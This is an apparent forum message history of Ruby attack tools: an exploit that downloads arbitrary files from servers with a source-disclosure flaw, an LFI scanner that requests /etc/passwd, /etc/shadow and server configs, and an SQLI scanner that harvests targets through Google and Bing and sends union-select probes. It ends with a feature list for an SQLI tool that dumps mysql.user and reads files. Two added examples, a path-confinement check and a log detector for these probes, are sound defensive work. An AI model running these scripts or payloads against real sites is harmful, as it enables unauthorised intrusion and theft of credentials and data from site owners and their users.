Messages - BigBear

#51
Scripting / [Ruby] FSD Exploit Manager 0.3
4 September 2015, 23:01 PM
A simple Ruby script that serves as an exploit for the Full Source Disclosure vulnerability.

The code:

Code (ruby):

#!/usr/bin/ruby
#FSD Exploit Manager 0.3

require "open-uri"
require "net/http" 

# Functions

def toma(web)
begin
return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
rescue
return "Error"
end
end

def uso
print "\n[+] Sintax : ruby locateip.rb <target>\n"
end

def  head
print "\n\n-- == FSD Exploit Manager 0.3 == --\n\n"
end

def copyright
print "\n\n-- == (C) Doddy Hackman 2015 == --\n\n"
exit(1)
end

def installer
if not Dir.exists?("logs")
Dir.mkdir "logs"
end
Dir.chdir("logs")
end

def download(file,name)
File.open(name, "wb") do |saved_file|
open(file, "rb") do |read_file|
saved_file.write(read_file.read)
end
end
end

def scan_fsd(target)
print "\n[+] Scanning ...\n\n"
path = File.basename(URI(target).path)
code = toma(target+path)
if code=~/header\((.*)Content-Disposition: attachment;/
print "[+] Vulnerable !\n"
while(1)
print "\n[+] Insert Filename : "
filename = STDIN.gets.chomp
if filename=="exit"
copyright()
else
download(target+filename,filename)
print "\n[+] Downloaded !\n"
end
end

else
print "[-] Not vulnerable\n"
end
end

target = ARGV[0]

installer()

head()

if !target
uso()
else
scan_fsd(target)
end

copyright()

#The End ?


That's all.
#52
Scripting / [Ruby] LFI Scanner 0.3
21 August 2015, 23:37 PM
A simple Ruby script to scan a page for the LFI vulnerability.

Console version:

Code (ruby):

#!/usr/bin/ruby
#LFI Scanner 0.3
#(C) Doddy Hackman 2015

require "open-uri"
require "net/http" 

# Functions

def toma(web)
begin
return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
rescue
return "Error"
end
end

def uso
print "\n[+] Sintax : ruby lfi.rb <page>\n"
end

def  head
print "\n\n-- == LFI Scanner 0.3 == --\n\n"
end

def copyright
print "\n\n-- == (C) Doddy Hackman 2015 == --\n\n"
exit(1)
end

def scan(web)
files = ['c:/xampp/here.php','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/
lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc']
print "\n[+] Testing the vulnerability LFI...\n\n"
code = toma(web+"'")
if code=~/No such file or directory in <b>(.*)<\/b> on line/
fpd = $1
print "[+] LFI Detected\n\n"
print "[Full Path Discloure]: "+fpd+"\n"
print "\n[+] Fuzzing Files\n\n"
files.each do |file|
code = toma(web+file)
if not code=~/No such file or directory in/
print "[Link] : "+web+file+"\n"
end
end
print "\n[+] Finish\n"
copyright()
else
print "[-] Not Vulnerable to LFI\n\n"
end
end

#

page = ARGV[0]

head()

if !page
uso()
else
scan(page)
end

copyright()

#The End ?


Tk version:

Code (ruby):

#!/usr/bin/ruby
#LFI Scanner 0.3
#(C) Doddy Hackman 2015

require "tk"
require "net/http"
require "open-uri"

# Functions

def toma(web)
begin
return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
rescue
return "Error"
end
end

#

window = TkRoot.new { title "LFI Scanner 0.3 (C) Doddy Hackman 2015" ; background "black" }
window['geometry'] = '300x300-20+10'

TkLabel.new(window) do
background "black"
foreground "cyan"
text "    Target : "
place('relx'=>"0.1",'rely'=>"0.1")
end

web= TkEntry.new(window){
background "black"
foreground "cyan"
width 25
place('relx'=>0.3,'rely'=>0.1)
}

TkLabel.new(window) do
background "black"
foreground "cyan"
text "Console"
place('relx'=>0.4,'rely'=>0.2)
end

console =TkText.new(window) do
background "black"
foreground "cyan"
width 30
height 10
place('relx'=>0.1,'rely'=>0.3)
end

TkButton.new(window) do
text "Search"
    background "black"
foreground "cyan"
width 17
activebackground "cyan"
highlightbackground  "cyan"
command proc{
web = web.value.to_s
files = ['c:/xampp/here.php','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/
lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc']
console.insert("end", "[+] Testing the vulnerability LFI...\n\n")
code = toma(web+"'")
if code=~/No such file or directory in <b>(.*)<\/b> on line/
fpd = $1
console.insert("end","[+] LFI Detected\n\n")
console.insert("end","[Full Path Discloure]: "+fpd+"\n")
console.insert("end","\n[+] Fuzzing Files\n\n")
files.each do |file|
code = toma(web+file)
if not code=~/No such file or directory in/
console.insert("end","[Link] : "+web+file+"\n")
end
end
console.insert("end","\n[+] Finish")
else
console.insert("end","[-] Not Vulnerable to LFI")
end
}
place('relx'=>0.3,'rely'=>0.9)
end

Tk.mainloop

#The End ?


That's all.
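
Both scripts above (FSD Exploit Manager and LFI Scanner) only get results from a server-side handler that passes a request parameter to a file read or include unchecked. As an added example, not part of the original posts, this Ruby sketch shows the path confinement check such a handler lacks; `resolve_download`, the directory layout and the sample requests are constructed for illustration.

```ruby
require "fileutils"
require "tmpdir"

# Hypothetical helper (not from the posts): map a requested name to a real
# file, or nil when the request leaves the directory meant to be served.
def resolve_download(base_dir, requested)
  return nil if requested.nil? || requested.empty? || requested.include?("\0")

  base = File.realpath(base_dir)
  # An absolute request such as /etc/passwd replaces the base here, so the
  # prefix check below is what rejects it.
  candidate = File.expand_path(requested, base)
  begin
    real = File.realpath(candidate) # resolves ../ and symlinks, raises if absent
  rescue SystemCallError
    return nil
  end
  return nil unless real.start_with?(base + File::SEPARATOR)
  return nil unless File.file?(real)

  real
end

# Constructed layout: the handler source sits outside the served directory.
def demo_resolve
  Dir.mktmpdir do |root|
    served = File.join(root, "files")
    FileUtils.mkdir_p(served)
    File.write(File.join(root, "download.php"), "<?php /* handler source */")
    File.write(File.join(served, "report.pdf"), "constructed sample")
    File.symlink(File.join(root, "download.php"), File.join(served, "link.pdf"))

    requests = ["report.pdf", "download.php", "../download.php", "link.pdf",
                "/etc/passwd", "../../../boot.ini", "report.pdf\0.php"]
    requests.to_h { |name| [name, !resolve_download(served, name).nil?] }
  end
end

if __FILE__ == $PROGRAM_NAME
  demo_resolve.each do |name, ok|
    puts format("%-24s %s", name.inspect, ok ? "served" : "refused")
  end
end
```

Only `report.pdf` is served; the handler's own source, the symlink that points at it, the traversal strings and the absolute path are all refused because the resolved path falls outside the served directory.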
#53
Scripting / [Ruby] SQLI Scanner 0.4
7 August 2015, 22:25 PM
A simple Ruby script to search for pages vulnerable to SQLI using Google or Bing.

Console version:

Code (ruby):

#!/usr/bin/ruby
#SQLI Scanner 0.4
#(C) Doddy Hackman 2015

require "open-uri"
require "net/http"
require "openssl"

# Functions

def toma(web)
begin
return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
rescue
return "Error"
end
end


def toma_ssl(web)
uri = URI.parse(web)
nave = Net::HTTP.new(uri.host, uri.port)
nave.use_ssl = true
nave.verify_mode = OpenSSL::SSL::VERIFY_NONE
return nave.get(uri.request_uri,{"User-Agent"=> "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/20.0"}).body
end


def tomar(web,arg)
begin
headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"}
uri = URI(web)
http = Net::HTTP.new(uri.host, uri.port)
return http.post(uri.path,arg, headers).body
rescue
return "Error"
end
end

def cortar(pages)
final = ""
finales = []
pages.flatten.each do |page|
if page=~/(.*)=(.*)/
parte1 = $1
parte2 = $2
final = parte1 + "="
finales.push(final)
end
end
return finales
end


def google(dork,pages)

links = []
dork = dork.sub(/ /,"+")
contador = 0
for i in ("1"..pages)
contador+=10
code = toma_ssl("https://www.google.com.ar/search?hl=&q=" + dork+ "&start="+contador.to_s)
paginas = code.scan(/(?<="r"><. href=")(.+?)"/)
paginas.flatten.each do |pagina|
partes = pagina
if partes=~/url\?q=(.*)&amp;sa/
parte = $1
link = URI::decode(parte)
links.push(link)
end
end
end
links = links.uniq
return links
end

def google_recursive(dork,pages)
dork = dork.sub(/ /,"+")
contador = 0
guardo = []
for i in ("1"..pages)
contador+=10
url = "https://www.google.com.ar/search?hl=&q="+dork+"&start="+contador.to_s
code = toma_ssl(url)
links = URI::extract(code)
links.each do |link|
if link=~/cache:(.*?):(.*?)\+/
link_final = "http://"+$2
link_final = URI::decode(link_final)
guardo.push(link_final)
end
end
end
guardo = guardo.uniq
return guardo
end

def bing(dork,pages)

guardo = []
dork = dork.sub(/ /,"+")
contador = 0
for i in ("1"..pages)
contador+=10

code = toma("http://www.bing.com/search?q=" + dork + "&first=" + contador.to_s)

links = code.scan(/<h2><a href="(.*?)" h/)

links.flatten.each do |link|
link_final = URI::decode(link)
if not link_final=~/http:\/\/778802\.r\.msn\.com\//
guardo.push(link_final)
end
end

links = code.scan(/<h3><a href="(.*?)" h/)

links.flatten.each do |link|
link_final = URI::decode(link)
if not link_final=~/http:\/\/778802\.r\.msn\.com\//
guardo.push(link_final)
end
end
end
guardo = guardo.uniq
return guardo
end

def uso
print "\n[+] Sintax : ruby scanner.rb <options> <dork> <pages>\n\n"
print "-search_bing : Find in Bing\n"
print "-search_google : Find in Google\n"
print "-scan_bing : Find SQLI in Bing\n"
print "-scan_google : Find SQLI in Google\n"
print "\n[+] Example of use : ruby scanner.rb -scan_bing news.php+id 3\n"
end

def  head
print "\n\n-- == SQLI Scanner 0.4 == --\n\n"
end

def copyright
print "\n\n-- == (C) Doddy Hackman 2015 == --\n\n"
end

opcion = ARGV[0]
dork = ARGV[1]
pages  = ARGV[2]

head()

if !opcion or !dork or !pages
uso()
else

if opcion=="-search_bing"

print "\n[+] Searching in Bing ...\n\n"

links = bing(dork,pages)

print "[+] Pages Count : "+links.count.to_s+"\n\n"

if links.count.to_s=="0"
print "[-] Links not found\n"
end

links.flatten.each do |link|
print "[+] Link : "+link+"\n"
end

print "\n[+] Finished\n"

elsif opcion=="-search_google"

print "\n[+] Searching in Google ...\n\n"

links = google(dork,pages)

if links.count.to_s=="0"
print "[+] Searching in Google again ...\n\n"
links = google_recursive(dork,pages)
end

print "[+] Pages Count : "+links.count.to_s

if links.count.to_s=="0"
print "[-] Links not found"
end

links.flatten.each do |link|
print "[+] Link : "+link+"\n"
end

print "\n[+] Finished\n"

elsif opcion=="-scan_bing"

print "\n[+] Searching in Bing ...\n\n"

links = cortar(bing(dork,pages))

print "[+] Pages Count : "+links.count.to_s+"\n\n"

if links.count.to_s=="0"
print "[-] Links not found\n"
end

links.flatten.each do |link|
print "[+] Link : "+link
begin
url = toma(link + "-1+union+select+1--")
if url=~/The used SELECT statements have a different number of columns/
print " [OK]\n\a\a"
else
print " [FAIL]\n"
end
rescue
print " [FAIL]\n"
end
end

print "\n[+] Finished\n"

elsif opcion=="-scan_google"

print "\n[+] Searching in Google ...\n\n"

links = cortar(google(dork,pages))

if links.count.to_s=="0"
print "[+] Searching in Google again ...\n\n"
links = cortar(google_recursive(dork,pages))
end

print "[+] Pages Count : "+links.count.to_s+"\n\n"

if links.count.to_s=="0"
print "[-] Links not found"
end

links.flatten.each do |link|
print "[+] Link : "+link
begin
url = toma(link + "-1+union+select+1--")
if url=~/The used SELECT statements have a different number of columns/
print " [OK]\n\a\a"
else
print " [FAIL]\n"
end
rescue
print " [FAIL]\n"
end
end

print "\n[+] Finished\n"
else
print "[-] Bad Option"
end
end

copyright()


#The End ?


Tk version for Google:

Code (ruby):

#!/usr/bin/ruby
#SQLI Scanner 0.4
#(C) Doddy Hackman 2015
#Scan Google Tk

require "tk"
require "open-uri"
require "net/http"
require "openssl"

# Functions

def toma(web)
begin
return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
rescue
return "Error"
end
end


def toma_ssl(web)
uri = URI.parse(web)
nave = Net::HTTP.new(uri.host, uri.port)
nave.use_ssl = true
nave.verify_mode = OpenSSL::SSL::VERIFY_NONE
return nave.get(uri.request_uri,{"User-Agent"=> "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/20.0"}).body
end


def tomar(web,arg)
begin
headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"}
uri = URI(web)
http = Net::HTTP.new(uri.host, uri.port)
return http.post(uri.path,arg, headers).body
rescue
return "Error"
end
end

def cortar(pages)
final = ""
finales = []
pages.flatten.each do |page|
if page=~/(.*)=(.*)/
parte1 = $1
parte2 = $2
final = parte1 + "="
finales.push(final)
end
end
return finales
end


def google(dork,pages)

links = []
dork = dork.sub(/ /,"+")
contador = 0
for i in ("1"..pages)
contador+=10
code = toma_ssl("https://www.google.com.ar/search?hl=&q=" + dork+ "&start="+contador.to_s)
paginas = code.scan(/(?<="r"><. href=")(.+?)"/)
paginas.flatten.each do |pagina|
partes = pagina
if partes=~/url\?q=(.*)&amp;sa/
parte = $1
link = URI::decode(parte)
links.push(link)
end
end
end
links = links.uniq
return links
end

def google_recursive(dork,pages)
dork = dork.sub(/ /,"+")
contador = 0
guardo = []
for i in ("1"..pages)
contador+=10
url = "https://www.google.com.ar/search?hl=&q="+dork+"&start="+contador.to_s
code = toma_ssl(url)
links = URI::extract(code)
links.each do |link|
if link=~/cache:(.*?):(.*?)\+/
link_final = "http://"+$2
link_final = URI::decode(link_final)
guardo.push(link_final)
end
end
end
guardo = guardo.uniq
return guardo
end

def bing(dork,pages)

guardo = []
dork = dork.sub(/ /,"+")
contador = 0
for i in ("1"..pages)
contador+=10

code = toma("http://www.bing.com/search?q=" + dork + "&first=" + contador.to_s)

links = code.scan(/<h2><a href="(.*?)" h/)

links.flatten.each do |link|
link_final = URI::decode(link)
if not link_final=~/http:\/\/778802\.r\.msn\.com\//
guardo.push(link_final)
end
end

links = code.scan(/<h3><a href="(.*?)" h/)

links.flatten.each do |link|
link_final = URI::decode(link)
if not link_final=~/http:\/\/778802\.r\.msn\.com\//
guardo.push(link_final)
end
end
end
guardo = guardo.uniq
return guardo
end

#

window = TkRoot.new { title "SQLI Scanner 0.4 - Scanner Google" ; background "black" }
window['geometry'] = '300x320-20+10'

TkLabel.new(window) do
background "black"
foreground "green"
text "    Dork : "
place('relx'=>"0.1",'rely'=>"0.1")
end

dork = TkEntry.new(window){
background "black"
foreground "green"
width 25
place('relx'=>0.3,'rely'=>0.1)
}

TkLabel.new(window) do
background "black"
foreground "green"
text "    Pages : "
place('relx'=>"0.1",'rely'=>"0.2")
end

pages = TkEntry.new(window){
background "black"
foreground "green"
width 25
place('relx'=>0.3,'rely'=>0.2)
}

TkLabel.new(window) do
background "black"
foreground "green"
text "Console"
place('relx'=>0.4,'rely'=>0.3)
end

console =TkText.new(window) do
background "black"
foreground "green"
width 30
height 9
place('relx'=>0.1,'rely'=>0.4)
end

TkButton.new(window) do
text "Search"
    background "black"
foreground "green"
width 17
activebackground "green"
highlightbackground  "green"
command proc{

dork = dork.value.to_s
pages = pages.value.to_s

console.insert("end",  "[+] Searching in Google ...\n\n")

links = cortar(google(dork,pages))

if links.count.to_s=="0"
console.insert("end",  "[+] Searching in Google again ...\n\n")
links = cortar(google_recursive(dork,pages))
end

console.insert("end", "[+] Pages Count : "+links.count.to_s+"\n\n")

if links.count.to_s=="0"
console.insert("end", "[-] Links not found")
end

links.flatten.each do |link|
console.insert("end", "[+] Link : "+link)
begin
url = toma(link + "-1+union+select+1--")
if url=~/The used SELECT statements have a different number of columns/
console.insert("end"," [OK]\n\a\a")
else
console.insert("end"," [FAIL]\n")
end
rescue
console.insert("end", " [FAIL]\n")
end
end

console.insert("end",  "\n[+] Finished")

}
place('relx'=>0.3,'rely'=>0.9)
end

Tk.mainloop

#The End ?


Tk version for Bing:

Code (ruby):

#!/usr/bin/ruby
#SQLI Scanner 0.4
#(C) Doddy Hackman 2015
#Scan Bing Tk

require "tk"
require "open-uri"
require "net/http"
require "openssl"

# Functions

def toma(web)
begin
return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
rescue
return "Error"
end
end


def toma_ssl(web)
uri = URI.parse(web)
nave = Net::HTTP.new(uri.host, uri.port)
nave.use_ssl = true
nave.verify_mode = OpenSSL::SSL::VERIFY_NONE
return nave.get(uri.request_uri,{"User-Agent"=> "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/20.0"}).body
end


def tomar(web,arg)
begin
headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"}
uri = URI(web)
http = Net::HTTP.new(uri.host, uri.port)
return http.post(uri.path,arg, headers).body
rescue
return "Error"
end
end

def cortar(pages)
final = ""
finales = []
pages.flatten.each do |page|
if page=~/(.*)=(.*)/
parte1 = $1
parte2 = $2
final = parte1 + "="
finales.push(final)
end
end
return finales
end


def google(dork,pages)

links = []
dork = dork.sub(/ /,"+")
contador = 0
for i in ("1"..pages)
contador+=10
code = toma_ssl("https://www.google.com.ar/search?hl=&q=" + dork+ "&start="+contador.to_s)
paginas = code.scan(/(?<="r"><. href=")(.+?)"/)
paginas.flatten.each do |pagina|
partes = pagina
if partes=~/url\?q=(.*)&amp;sa/
parte = $1
link = URI::decode(parte)
links.push(link)
end
end
end
links = links.uniq
return links
end

def google_recursive(dork,pages)
dork = dork.sub(/ /,"+")
contador = 0
guardo = []
for i in ("1"..pages)
contador+=10
url = "https://www.google.com.ar/search?hl=&q="+dork+"&start="+contador.to_s
code = toma_ssl(url)
links = URI::extract(code)
links.each do |link|
if link=~/cache:(.*?):(.*?)\+/
link_final = "http://"+$2
link_final = URI::decode(link_final)
guardo.push(link_final)
end
end
end
guardo = guardo.uniq
return guardo
end

def bing(dork,pages)

guardo = []
dork = dork.sub(/ /,"+")
contador = 0
for i in ("1"..pages)
contador+=10

code = toma("http://www.bing.com/search?q=" + dork + "&first=" + contador.to_s)

links = code.scan(/<h2><a href="(.*?)" h/)

links.flatten.each do |link|
link_final = URI::decode(link)
if not link_final=~/http:\/\/778802\.r\.msn\.com\//
guardo.push(link_final)
end
end

links = code.scan(/<h3><a href="(.*?)" h/)

links.flatten.each do |link|
link_final = URI::decode(link)
if not link_final=~/http:\/\/778802\.r\.msn\.com\//
guardo.push(link_final)
end
end
end
guardo = guardo.uniq
return guardo
end

#

window = TkRoot.new { title "SQLI Scanner 0.4 - Scanner Bing" ; background "black" }
window['geometry'] = '300x320-20+10'

TkLabel.new(window) do
background "black"
foreground "green"
text "    Dork : "
place('relx'=>"0.1",'rely'=>"0.1")
end

dork = TkEntry.new(window){
background "black"
foreground "green"
width 25
place('relx'=>0.3,'rely'=>0.1)
}

TkLabel.new(window) do
background "black"
foreground "green"
text "    Pages : "
place('relx'=>"0.1",'rely'=>"0.2")
end

pages = TkEntry.new(window){
background "black"
foreground "green"
width 25
place('relx'=>0.3,'rely'=>0.2)
}

TkLabel.new(window) do
background "black"
foreground "green"
text "Console"
place('relx'=>0.4,'rely'=>0.3)
end

console =TkText.new(window) do
background "black"
foreground "green"
width 30
height 9
place('relx'=>0.1,'rely'=>0.4)
end

TkButton.new(window) do
text "Search"
    background "black"
foreground "green"
width 17
activebackground "green"
highlightbackground  "green"
command proc{

dork = dork.value.to_s
pages = pages.value.to_s

console.insert("end", "[+] Searching in Bing ...\n\n")

links = cortar(bing(dork,pages))

console.insert("end", "[+] Pages Count : "+links.count.to_s+"\n\n")

if links.count.to_s=="0"
console.insert("end","[-] Links not found\n")
end

links.flatten.each do |link|
console.insert("end", "[+] Link : "+link)
begin
url = toma(link + "-1+union+select+1--")
if url=~/The used SELECT statements have a different number of columns/
console.insert("end"," [OK]\n\a\a")
else
console.insert("end", " [FAIL]\n")
end
rescue
console.insert("end"," [FAIL]\n")
end
end

console.insert("end",  "\n[+] Finished")

}
place('relx'=>0.3,'rely'=>0.9)
end

Tk.mainloop

#The End ?


That's all.
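
The requests sent by the three scripts above stand out in a web server access log: the LFI scanner's single-quote probe followed by wordlist paths, the SQLI scanner's `-1+union+select+1--` suffix, and the FSD script's request for the handler's own file name. As an added example (not part of the original posts), this Ruby detector flags clients by those patterns; the log lines, addresses and the `min_files` threshold are constructed assumptions.

```ruby
require "uri"

# Combined Log Format: captures client address, request target and status.
LOG_RE = /\A(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) \S+/

# Value shapes taken from the scripts on this page: traversal runs and
# absolute system paths (LFI wordlist), the union-select probe (SQLI scanner).
FILE_RE  = %r{(?:\.\./){2,}|\A/(?:etc|var|usr|opt|private|Volumes)/|\A[a-z]:[\\/]}i
UNION_RE = /union\s+select/i

def decode(value)
  URI.decode_www_form_component(value) # also turns "+" into a space
rescue ArgumentError
  value # malformed %-escape: classify the raw text instead of dropping it
end

# Return the probe tags that one request target earns.
def classify(target)
  path, query = target.split("?", 2)
  return [] if query.nil?

  tags = []
  query.split("&").each do |pair|
    value = decode(pair.split("=", 2)[1].to_s)
    tags << :quote if value.end_with?("'")
    tags << :file if value =~ FILE_RE
    tags << :union if value =~ UNION_RE
    # A download parameter naming the handler itself (source disclosure check).
    tags << :self_source if !value.empty? && value == File.basename(path)
  end
  tags.uniq
end

# Aggregate tags per client and report the clients that match a scan pattern.
def detect(lines, min_files: 3)
  seen = Hash.new { |h, k| h[k] = Hash.new(0) }
  lines.each do |line|
    m = LOG_RE.match(line)
    next unless m
    classify(m[2]).each { |tag| seen[m[1]][tag] += 1 }
  end

  findings = {}
  seen.each do |ip, count|
    hits = []
    hits << :lfi_scan if count[:quote] >= 1 && count[:file] >= min_files
    hits << :sqli_probe if count[:union] >= 1
    hits << :source_disclosure_probe if count[:self_source] >= 1
    findings[ip] = hits unless hits.empty?
  end
  findings
end

# Constructed sample log (documentation address ranges, not real traffic).
SAMPLE_LOG = <<~LOG.lines.map(&:chomp)
  192.0.2.10 - - [21/Aug/2015:23:37:01 +0000] "GET /index.php?page=' HTTP/1.1" 200 512 "-" "Mozilla/5.0"
  192.0.2.10 - - [21/Aug/2015:23:37:02 +0000] "GET /index.php?page=../../../boot.ini HTTP/1.1" 200 498 "-" "Mozilla/5.0"
  192.0.2.10 - - [21/Aug/2015:23:37:02 +0000] "GET /index.php?page=/etc/passwd HTTP/1.1" 200 1301 "-" "Mozilla/5.0"
  192.0.2.10 - - [21/Aug/2015:23:37:03 +0000] "GET /index.php?page=/etc/hosts HTTP/1.1" 200 498 "-" "Mozilla/5.0"
  198.51.100.7 - - [07/Aug/2015:22:25:10 +0000] "GET /news.php?id=-1+union+select+1-- HTTP/1.1" 200 310 "-" "Mozilla/5.0"
  203.0.113.5 - - [04/Sep/2015:23:01:44 +0000] "GET /download.php?file=download.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
  203.0.113.9 - - [04/Sep/2015:23:05:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 900 "-" "Mozilla/5.0"
  203.0.113.9 - - [04/Sep/2015:23:05:09 +0000] "GET /download.php?file=report.pdf HTTP/1.1" 200 7000 "-" "Mozilla/5.0"
LOG

if __FILE__ == $PROGRAM_NAME
  detect(SAMPLE_LOG).each { |ip, hits| puts "#{ip}: #{hits.join(', ')}" }
end
```

The client at 203.0.113.9 makes ordinary requests to the same endpoints and is not flagged.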
#54
Scripting / [Ruby] K0bra 0.5
24 July 2015, 18:12 PM
Improved version of this Ruby script for scanning a page for the SQLI vulnerability.

The script has the following options:

  • Check for the vulnerability
  • Find the number of columns
  • Automatically find the number used to display data
  • Show tables
  • Show columns
  • Show databases
  • Show tables of another DB
  • Show columns of a table in another DB
  • Show users from mysql.user
  • Search for files using load_file
  • Show a file using load_file
  • Show values
